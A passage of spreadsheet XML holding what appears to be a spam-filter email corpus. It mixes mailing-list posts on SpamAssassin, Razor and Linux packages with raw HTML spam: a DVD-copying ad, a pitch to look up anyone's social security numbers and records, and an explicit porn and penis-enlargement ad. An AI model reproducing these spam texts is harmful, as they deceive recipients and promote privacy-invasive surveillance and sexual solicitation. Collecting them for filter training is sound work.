 &lt;td&gt;&lt;img name="mailer4_r4_c1" src="http://www.copymydvd.com/mailer4/mailer4_r4_c1.gif" width="15" height="144" 
 border="0"&gt;&lt;/td&gt; 
 &lt;td background="mailer4_r4_c2.gif"&gt; 
 &lt;div align="left"&gt; 
 &lt;p align="left"&gt;&lt;font color="#FFFFFF" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="2"&gt;"Thanks 
 for the useful and very easy to use DVDCOPY System... I couldn't have 
 done it without you."&lt;br&gt; 
 &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font color="#FFFFFF" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="2"&gt;- 
 Jim Sanborn&lt;/font&gt;&lt;br&gt; 
 &lt;/b&gt; &lt;/font&gt; &lt;/p&gt; 
 &lt;/div&gt; 
 &lt;/td&gt; 
 &lt;td&gt;&lt;img name="mailer4_r4_c3" src="http://www.copymydvd.com/mailer4/mailer4_r4_c3.gif" width="21" height="144" 
 border="0"&gt;&lt;/td&gt; 
 &lt;td&gt;&lt;img src="http://www.copymydvd.com/mailer4/spacer.gif" width="1" height="144" border="0"&gt;&lt;/td&gt; 
 &lt;/tr&gt; 
 &lt;tr&gt; 
 &lt;td rowspan="2" colspan="5"&gt;&lt;img name="mailer4_r5_c1" src="http://www.copymydvd.com/mailer4/mailer4_r5_c1.gif" width="583" 
 height="19" border="0"&gt;&lt;/td&gt; 
 &lt;td&gt;&lt;img src="http://www.copymydvd.com/mailer4/spacer.gif" width="1" height="11" border="0"&gt;&lt;/td&gt; 
 &lt;/tr&gt; 
 &lt;tr&gt; 
 &lt;td&gt;&lt;img src="http://www.copymydvd.com/mailer4/spacer.gif" width="1" height="8" border="0"&gt;&lt;/td&gt; 
 &lt;/tr&gt; 
 &lt;/table&gt; 
 &lt;/body&gt; 
 &lt;/html&gt;&lt;!--03ap7--&gt;&lt;table&gt;
 &lt;!--99000262292/13--&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font color="white" face="arial" size="1"&gt;
 &lt;text="#ffffff"&gt;Your email address has been submitted to The PermissionPass Network for mailing by one of our merchant clients, or included as part of an assets purchase.  You may permanently remove yourself by clicking &lt;a href="http://www.permissionpass.com/optout.php?email=jm@netnoteinc.com&amp;pos=99000262292"&gt;HERE&lt;/a&gt;.  Thank you.
 &lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 --##########--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: be your own private eye online
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=3D(0022)http://internet.e-mail --&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html;charset=
 =3Diso-8859-1"&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1=
 "&gt;
 &lt;META content=3D"MSHTML 5.50.4207.2601" name=3DGENERATOR&gt;
 &lt;/HEAD&gt;
 &lt;BODY link=3D"#0000FF" vlink=3D"#0000FF" alink=3D"#0000FF" bgColor=3D#FFFF=
 FF&gt;
 &lt;DIV&gt;
   &lt;table width=3D"601" border=3D"4" cellspacing=3D"1" cellpadding=3D"2" al=
 ign=3D"center" bgcolor=3D"#FFFFFF" height=3D"564"&gt;
     &lt;tr&gt;
       &lt;td&gt;
 &lt;div&gt;&lt;br&gt;
           &lt;table width=3D"500" border=3D2 align=3D"center" bgcolor=3D"#000=
 099"&gt;
             &lt;tbody&gt;
             &lt;tr bgcolor=3D#000099&gt;
               &lt;td height=3D48&gt;
                 &lt;div align=3Dcenter&gt;&lt;font face=3DArial size=3D5&gt;&lt;font colo=
 r=3D"#000000" face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"6"&gt;&lt;b=
 &gt;&lt;font color=3D"#E8E8E8"&gt;Internet
                   Investigator&lt;/font&gt;&lt;/b&gt;&lt;font color=3D"#E8E8E8"&gt;&amp;#153;&lt;/f=
 ont&gt;&lt;/font&gt;
                   &lt;/font&gt;&lt;/div&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
             &lt;/tbody&gt;
           &lt;/table&gt;
           &lt;p align=3Dcenter&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" co=
 lor=3D"#000000" size=3D"6"&gt;&lt;b&gt; 
             &lt;font color=3D"#0000CC"&gt;- New&lt;/font&gt; &lt;font color=3D"#0000CC"&gt;f=
 or&lt;/font&gt; 
             &lt;font color=3D"#0000CC"&gt;2002 -&lt;br&gt;
             &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"5"&gt;&lt;b&gt;&lt;font size=3D"4" color=3D"#333333"&gt;Internet 
             Software for Online Investigations&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;table width=3D"500" border=3D"0" cellspacing=3D"0" cellpadding=3D=
 "0" align=3D"center"&gt;
             &lt;tr&gt;
               &lt;td&gt;
                 &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, Helvetica, sans=
 -serif" color=3D"#FF0000"&gt;&lt;b&gt;&lt;font size=3D"5"&gt;Find
                   Out &lt;b&gt;Anything&lt;/b&gt; about Anyone&lt;/font&gt;&lt;/b&gt;&lt;font size=3D=
 "5"&gt;&lt;b&gt;
                   Online&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;br&gt;
           &lt;table width=3D"500" border=3D"0" cellspacing=3D"0" cellpadding=3D=
 "0" align=3D"center"&gt;
             &lt;tr&gt;
               &lt;td&gt;
                 &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, Helvetica, sans=
 -serif"&gt;&lt;b&gt;&lt;font size=3D"3"&gt;&lt;u&gt;&lt;font color=3D"#0000cc"&gt;&lt;a href=3D"http://i=
 spy.stuffing4dollars.com/index.html?RepID=3DRS"&gt;Uncover 
                   Information about&lt;/a&gt;&lt;/font&gt;&lt;/u&gt;&lt;a href=3D"http://ii.cyb=
 old.net/index.html?RepID=3DBH"&gt;&lt;font color=3D"#0000cc"&gt;:&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;=
 &lt;/b&gt;&lt;font color=3D"#000099" size=3D"3"&gt;&lt;b&gt; 
                   &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D=
 "#000099" size=3D"3"&gt;&lt;b&gt;&lt;font color=3D"#999999"&gt;&lt;font color=3D"#666666"&gt;en=
 emies,&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;font color=3D"#666666"&gt; 
                   &lt;/font&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" color=
 =3D"#666666"&gt;&lt;font size=3D"3"&gt;&lt;b&gt;debtors,&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;font color=3D"=
 #666666"&gt; 
                   neighbors, friends, employees, co-workers, your boss, yo=
 urself, 
                   associates, former school or military buddies, even a ne=
 w love 
                   interest.&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;br&gt;
           &lt;table width=3D"500" border=3D"0" cellspacing=3D"0" cellpadding=3D=
 "0" align=3D"center"&gt;
             &lt;tr&gt;
               &lt;td height=3D"45"&gt;
                 &lt;div align=3D"left"&gt;&lt;/div&gt;
                 &lt;p align=3Dcenter&gt;&lt;font face=3D"Arial, Helvetica, sans-ser=
 if" color=3D"#666666" size=3D"5"&gt;&lt;b&gt;&lt;font size=3D"4"&gt;Become 
                   an Internet Investigator and explore an exciting new wor=
 ld of 
                   valuable information.&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;div align=3D"left"&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 color=3Dblack
 size=3D5&gt;&lt;b&gt;&lt;font size=3D4&gt;&lt;br&gt;
             &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 color=3Dblack&gt;&lt;b&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
           &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, Helvetica, sans-serif=
 " color=3D"#0000CC"&gt;&lt;b&gt;&lt;span style=3D"font-size:12.0pt;font-family:Arial;
 Times New Roman&amp;quot;;color:#0000cc;"&gt;&lt;font size=3D"4"&gt;With Internet Inves=
 tigator&amp;#153; 
             &lt;/font&gt;&lt;/span&gt;&lt;font face=3D"Arial" size=3D"4"&gt;you can investig=
 ate:&lt;/font&gt;&lt;/b&gt;&lt;/font&gt; 
           &lt;/div&gt;
           &lt;table width=3D"500" border=3D"0" cellspacing=3D"0" cellpadding=3D=
 "0" align=3D"center"&gt;
             &lt;tr&gt;
               &lt;td&gt;
                 &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, Helvetica, sans=
 -serif" color=3Dblack&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"3"&gt;&lt;font color=3D"#6=
 66666"&gt;People, 
                   &lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Arial" size=3D"3" color=3D=
 "#666666"&gt;&lt;b&gt;credit 
                   records, social security numbers, employment records, sc=
 hool 
                   records, criminal records, driving records, addresses, p=
 hone 
                   numbers (even some unlisted), hidden assets, family tree=
 s&lt;/b&gt;&lt;/font&gt; 
                   &lt;font size=3D"3" color=3D"#666666"&gt;&lt;b&gt;&lt;font face=3D"Aria=
 l"&gt;&lt;span style=3D" color=3D"#330066"&gt;and 
                   a whole lot more!&lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;a href=3D"http://ispy.stuffing4dollars/index.html?RepID=3DBH"&gt;&lt;=
 br&gt;
           &lt;/a&gt;&lt;/div&gt;
         &lt;div&gt; 
           &lt;p align=3Dcenter&gt;&lt;a href=3D"http://ispy.stuffing4dollars.com/in=
 dex.html?RepID=3DRS"&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font =
 size=3D4&gt;Click 
             Here for more Information&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
             &lt;br&gt;
           &lt;/p&gt;
         &lt;/div&gt;
   &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&lt;font size=3D"2" face=3D"Verdana, Arial, Helvetica, =
 sans-serif"&gt;&lt;a href=3D"#listlink"&gt;&lt;br&gt;
     &lt;font size=3D"1"&gt;Unsubscribe Instructions&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&lt;font size=3D"2" face=3D"Verdana, Arial, Helvetica, =
 sans-serif"&gt;&lt;a name=3D"listlink"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
   &lt;table width=3D"597" border=3D"0" cellspacing=3D"0" cellpadding=3D"0" he=
 ight=3D"346" align=3D"center"&gt;
     &lt;tr&gt;
       &lt;td height=3D"372" valign=3D"top"&gt;
         &lt;div align=3D"left"&gt;&lt;span style=3D'font-size:7.5pt;mso-bidi-font-s=
 ize:12.0pt;
 font-family:Verdana;color:black'&gt;&lt;font color=3D"#999999"&gt;This message is a=
  commercial 
           advertisement. It is in full compliance with all federal and sta=
 te laws 
           regarding email advertising, including the California Business a=
 nd Professions 
           Code. We have provided &amp;quot;opt out&amp;quot; email contact so you =
 can 
           request to be taken off our mailing list. In addition we have pl=
 aced 
           &amp;quot;Adv:&amp;quot; in the subject line to provide you with notific=
 ation 
           in advance that this is a commercial advertisement. We do not wi=
 sh to 
           send our advertising to anyone who does not wish to receive it. =
 &lt;/font&gt;&lt;/span&gt;&lt;font color=3D"#999999"&gt;&lt;span style=3D'font-size:7.5pt;
 font-family:Verdana'&gt;If you would rather not receive any further informati=
 on from 
           us, please &lt;a href=3D"http://217.13.241.197/remove/?camp=3D1635-=
 001r"&gt;CLICK&lt;/a&gt; 
           to be taken off our list. In this way you can &amp;quot;opt-out&amp;quot=
 ; from 
           the list your email address was obtained from, whether it was &amp;q=
 uot;opt-in&amp;quot; 
           or otherwise. Please allow 5-10 business days for your email add=
 ress 
           to be&amp;nbsp;processed and taken off&amp;nbsp;all lists in our control=
 . Meanwhile, 
           delete any duplicate emails that you may receive and rest assure=
 d that 
           your request will be honored. If you have previously requested t=
 o be 
           taken off this list and are still receiving this advertisement, =
 &lt;/span&gt;&lt;span style=3D'font-size:7.5pt;font-family:Verdana'&gt; 
           you may call us at 1-(888) 817-9902, or write to: Abuse Control =
 Center, 
           7657 Winnetka Ave., Suite 245, Canoga Park, CA 91306&lt;/span&gt;&lt;/fon=
 t&gt;&lt;/div&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;p&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/DIV&gt;
 &lt;DIV&gt;&lt;/DIV&gt;
   &lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Webdev] site monitroring service?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 You could try elive.
 http://monitoring.elive.ie/
 At 12:01 PM 19/08/2002 +0100, Adrian Murphy wrote:
 &gt;Hi,
 &gt;I wonder could anyone reccommend a good
 &gt;website monitoring service-with sms alerts.
 &gt;thx and sorry to be OT.
 &gt;
 &gt;Adrian Murphy
 &gt;2020 Strategies
 &gt;Beechlawn
 &gt;Cloncrane
 &gt;Clonbullogue
 &gt;Co Offaly
 &gt;Ireland
 Lee Hosty -x- hostyle AT csn.ul.ie -x- +353 (0)86 8768780
 --
 SNITTERFIELD (n.)
 Office noticeboard on which snitters (q.v.),cards saying 'You don't have to be
 mad to work here, but if you are it helps !!!' and slightly smutty postcards
 from ibiza get pinned up by snitterbies (q.v.)
 _______________________________________________
 Webdev mailing list
 Webdev@linux.ie
 http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Sep 05, 2002 at 08:53:16PM -0400, Theo Van Dinter wrote:
 &gt; On Thu, Sep 05, 2002 at 06:16:57PM -0500, Mike Burger wrote:
 &gt; &gt; You might be better asking this on the spamassassin-talk list.  The folks 
 &gt; &gt; there will almost definitely have an answer for this.
 &gt; 
 &gt; I posted a fairly lengthy complete answer to this problem and how to
 &gt; get around it in SA 2.41 on the spamassassin-talk list. :)
 Thanks for the post there, it answered all my questions about
 spamassassin/razor interaction.
 Now for a razor question:
 I'm worried about having a server full of razor-agent.log files which keep
 on growing.  Is it possible to configure razor log via SYSLOG to make it
 easy to rotate logs?  Searching through the man pages didn't turn anything
 up...  Otherwise I'll have to write a script to go through each user's home
 directory looking for razor-agent.log files to rotate periodically.
 Thanks,
 Dave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</si>
  <si>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Mothers you want to fuck
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;MILFhunter&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type
 content="text/html; charset=windows-1252"&gt;&lt;HTTP-EQUIV="PRAGMA"
 CONTENT="NO-CACHE"&gt;
 &lt;SCRIPT language=JavaScript&gt;
 &lt;!-- hide from old browsers
 	function loadPage(pageURL){
 	location.href = pageURL.options[pageURL.selectedIndex].value
 	}
 //--&gt;
 &lt;/SCRIPT&gt;
 &lt;META content="MSHTML 6.00.2716.2200" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY text=#eaebec vLink=#ffffcc aLink=#ffffff link=#ffffcc bgColor=#647481
 leftMargin=0 background="http://www.fromyou2.com/nasty/milf/bg.jpg"
 topMargin=0&gt;
 &lt;CENTER&gt;&lt;BR&gt;
   &lt;CENTER&gt;
     &lt;CENTER&gt;
       &lt;FONT face=verdana&gt;&lt;BR&gt;
       &lt;/FONT&gt;
       &lt;CENTER&gt;
         &lt;TABLE cellPadding=15 bgColor=gray&gt;
           &lt;TBODY&gt;
           &lt;TR&gt;
             &lt;TD&gt;
               &lt;CENTER&gt;
                 &lt;font color="black" face="verdana"&gt;&lt;A
       onmouseover="window.status='MILFhunter.com - Do you know where your mom is?';return true"
       href="http://www.fromyou2.com/nasty/milf/milf/bindex.htm"&gt;&lt;IMG
       src="http://www.fromyou2.com/nasty/milf/1.jpg" border=1&gt;&lt;/A&gt;&lt;BR&gt;
                 &lt;/font&gt;&lt;FONT color=black&gt;
                 &lt;TABLE cellSpacing=24&gt;
                   &lt;TBODY&gt;
                   &lt;TR&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.fromyou2.com/nasty/milf/milf/bindex.htm"&gt;&lt;FONT
             color=lime&gt;&lt;IMG
             src="http://www.fromyou2.com/nasty/milf/amber-041.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.fromyou2.com/nasty/milf/milf/bindex.htm"&gt;&lt;FONT
             color=lime&gt;&lt;IMG
             src="http://www.fromyou2.com/nasty/milf/amber-054.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.fromyou2.com/nasty/milf/milf/bindex.htm"&gt;&lt;FONT
             color=lime&gt;&lt;IMG
             src="http://www.fromyou2.com/nasty/milf/amber-056.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.fromyou2.com/nasty/milf/milf/bindex.htm"&gt;&lt;FONT
             color=lime&gt;&lt;IMG
             src="http://www.fromyou2.com/nasty/milf/amber-057.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                   &lt;/TR&gt;
                   &lt;TR&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.fromyou2.com/nasty/milf/milf/bindex.htm"&gt;&lt;FONT
             color=lime&gt;&lt;IMG
             src="http://www.fromyou2.com/nasty/milf/amber-074.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.fromyou2.com/nasty/milf/milf/bindex.htm"&gt;&lt;FONT
             color=lime&gt;&lt;IMG
             src="http://www.fromyou2.com/nasty/milf/amber-142.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.fromyou2.com/nasty/milf/milf/bindex.htm"&gt;&lt;FONT
             color=lime&gt;&lt;IMG
             src="http://www.fromyou2.com/nasty/milf/amber-156.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.fromyou2.com/nasty/milf/milf/bindex.htm"&gt;&lt;FONT
             color=lime&gt;&lt;IMG
             src="http://www.fromyou2.com/nasty/milf/amber-148.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                   &lt;/TR&gt;
                   &lt;TR&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.fromyou2.com/nasty/milf/milf/bindex.htm"&gt;&lt;FONT
             color=lime&gt;&lt;IMG
             src="http://www.fromyou2.com/nasty/milf/amber-084.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.fromyou2.com/nasty/milf/milf/bindex.htm"&gt;&lt;FONT
             color=lime&gt;&lt;IMG
             src="http://www.fromyou2.com/nasty/milf/amber-137.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.fromyou2.com/nasty/milf/milf/bindex.htm"&gt;&lt;FONT
             color=lime&gt;&lt;IMG
             src="http://www.fromyou2.com/nasty/milf/amber-093.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.fromyou2.com/nasty/milf/milf/bindex.htm"&gt;&lt;FONT
             color=lime&gt;&lt;IMG
             src="http://www.fromyou2.com/nasty/milf/amber-143.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                   &lt;/TR&gt;
                   &lt;TR&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.fromyou2.com/nasty/milf/milf/bindex.htm"&gt;&lt;FONT
             color=lime&gt;&lt;IMG
             src="http://www.fromyou2.com/nasty/milf/amber-117.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.fromyou2.com/nasty/milf/milf/bindex.htm"&gt;&lt;FONT
             color=lime&gt;&lt;IMG
             src="http://www.fromyou2.com/nasty/milf/amber-010.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.fromyou2.com/nasty/milf/milf/bindex.htm"&gt;&lt;FONT
             color=lime&gt;&lt;IMG
             src="http://www.fromyou2.com/nasty/milf/amber-025.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.fromyou2.com/nasty/milf/milf/bindex.htm"&gt;&lt;FONT
             color=lime&gt;&lt;IMG
             src="http://www.fromyou2.com/nasty/milf/amber-029.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                   &lt;/TR&gt;
                   &lt;/TBODY&gt;
                 &lt;/TABLE&gt;
                 &lt;font face="verdana" size="6"&gt;&lt;B&gt;&lt;A
       onmouseover="window.status='MILFhunter.com - Do you know where your mom is?';return true"
       href="http://www.fromyou2.com/nasty/milf/milf/bindex.htm"&gt;&lt;FONT
       color=lime&gt;MILF HUNTER&lt;/FONT&gt;&lt;/A&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="verdana"&gt;&lt;B&gt;&lt;BR&gt;
                 &lt;/B&gt;&lt;FONT
       size=3&gt;Do you know where your mom is? &lt;BR&gt;
                 &lt;a href="http://www.fromyou2.com/nasty/milf/milf/bindex.htm"&gt;&lt;BR&gt;
                 &lt;FONT size=2&gt;&lt;B&gt;&lt;FONT
       color=lime&gt;MORE SAMPLE PICS&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;FONT
       color=lime&gt;MORE SAMPLE MOVIES&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;FONT
       color=lime&gt;LIST OF MILFs&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/a&gt;&lt;FONT size=2&gt;&lt;B&gt; &lt;BR&gt;
                 &lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/font&gt;&lt;/FONT&gt;
               &lt;/CENTER&gt;
             &lt;/TD&gt;
           &lt;/TR&gt;
           &lt;/TBODY&gt;
         &lt;/TABLE&gt;
         &lt;p&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p align="left"&gt;&lt;font color="#333333"&gt;&lt;a href="http://www.fromyou2.com/herbalo/bpenis/index.html"&gt;&lt;font size="+2"&gt;CLICK 
           HERE&lt;/font&gt;&lt;/a&gt;&lt;font size="+2"&gt; to enlarge your PENIS 3-4 inches NATURALLY!!&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;p&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p&gt;&amp;nbsp;&lt;/p&gt;
         &lt;div align="left"&gt;&lt;a href="http://www.wowthisiscool.net:81/removal/boca/"&gt;Click
           Here&lt;/a&gt; to be removed&lt;/div&gt;
         &lt;p&gt;&lt;font face="verdana"&gt;&lt;BR&gt;
           &lt;BR&gt;
           &lt;BR&gt;
           &lt;BR&gt;
           &lt;BR&gt;
           &lt;BR&gt;
           &lt;BR&gt;
           &lt;/font&gt;&lt;/p&gt;
       &lt;/CENTER&gt;
     &lt;/CENTER&gt;&lt;/CENTER&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 21 Jul 2002 15:12:11 -0400, che &lt;che666@uni.de&gt; wrote:
 &gt; &gt; &gt; &gt; The server mentioned above works again now :)!
 &gt; &gt; &gt; 
 &gt; &gt; &gt; Any problems with the rpm's they provided?
 &gt; &gt; 
 &gt; &gt; #redhat 7.3
 &gt; &gt; rpm http://apt.sunnmore.net gnome2 73
 &gt; &gt; rpm-src http://apt.sunnmore.net gnome2 73
 &gt; &gt; 
 &gt; &gt; #redhat 7.2
 &gt; &gt; rpm http://apt.sunnmore.net gnome2 72
 &gt; &gt; rpm-src http://apt.sunnmore.net gnome2 72
 &gt; &gt; 
 &gt; &gt; thats the correct lines to be added to sources.list for the repository
 &gt; &gt; 
 &gt; &gt; i just did a apt-get install gnome-session its still progressing :)
 &gt; &gt; 
 &gt; 
 &gt; after apt-get install gnome-session
 &gt; i did another apt-get upgrade (25 more packages) and it works now... i am in gnome 2.0 wohooooo :) looks very great very "tidy" only error message i got was about a mixer applet on login (no biggie to me) even the old sawfish still works. yet its great and works cant say anythign negative yet :)
 &gt; 
 &gt; just btw. if someone knows any other nice repositorys please post em :).
     Does it work more than once?
     Failed to fetch http://apt.sunnmore.net/gnome2/filename-here.rpm
    404 Not Found
     :)
     Server problems? Or is this a way to limit bandwidth?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</si>
  <si>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&gt; &gt;   your mail, and gives you only the non-spam.  To train it, you'd only need
 &gt; &gt;   to send it the false negatives somehow; it can assume that anything is
 &gt; &gt;   ham that you don't say is spam within 48 hours.
 &gt; 
 &gt; I have folks who leave their email programs running 24 hours a day,
 &gt; constantly polling for mail. If they go away for a long weekend,
 &gt; lots of "friday night spam" will become ham on sunday night.
 &gt; (Friday night seems to be the most popular time)
 So we'll make this a config parameter.
 &gt; &gt; - Your idea here.
 &gt; 
 &gt; Ultimately I'd like to see tight integration into the "most popular
 &gt; email clients".. As a stop-gap to the auto-ham ..
 What's an auto-ham?
 &gt; How about adding an IMAP server with a spam and deleted-ham
 &gt; folder. Most email clients can handle IMAP. Users should be able to
 &gt; quickly move "spam" into the spam folder.
 I personally don't think IMAP has a bright future, but for people who
 do use it, that's certainly a good approach.
 &gt; Instead of deleting messages (or, by reprogramming the delete
 &gt; function) they can quickly move ham into the ham folder.
 Yes.
 --Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Month by month, 'Most Beautiful Man' winners and their galleries. sfw
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8259314,1717/
 Date: 2002-09-26T01:15:08+01:00
 (me)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Canadians are knockin' boots less, or just not getting any
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8304313,1717/
 Date: 2002-09-27T08:51:29+01:00
 [IMG: http://www.newsisfree.com/Images/fark/cbc.ca.gif ([CBC])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] Re: [SACVS] CVS: spamassassin/rules 60_whitelist.cf,1.29,1.30
</t>
  </si>
  <si>
    <t xml:space="preserve">On Monday 09 September 2002 11:13 CET Matt Sergeant wrote:
 &gt; Malte S. Stretz wrote:
 &gt; &gt;[...]
 &gt; &gt; So I'd vote for a complete removal of 60_whitelists.cf and a page
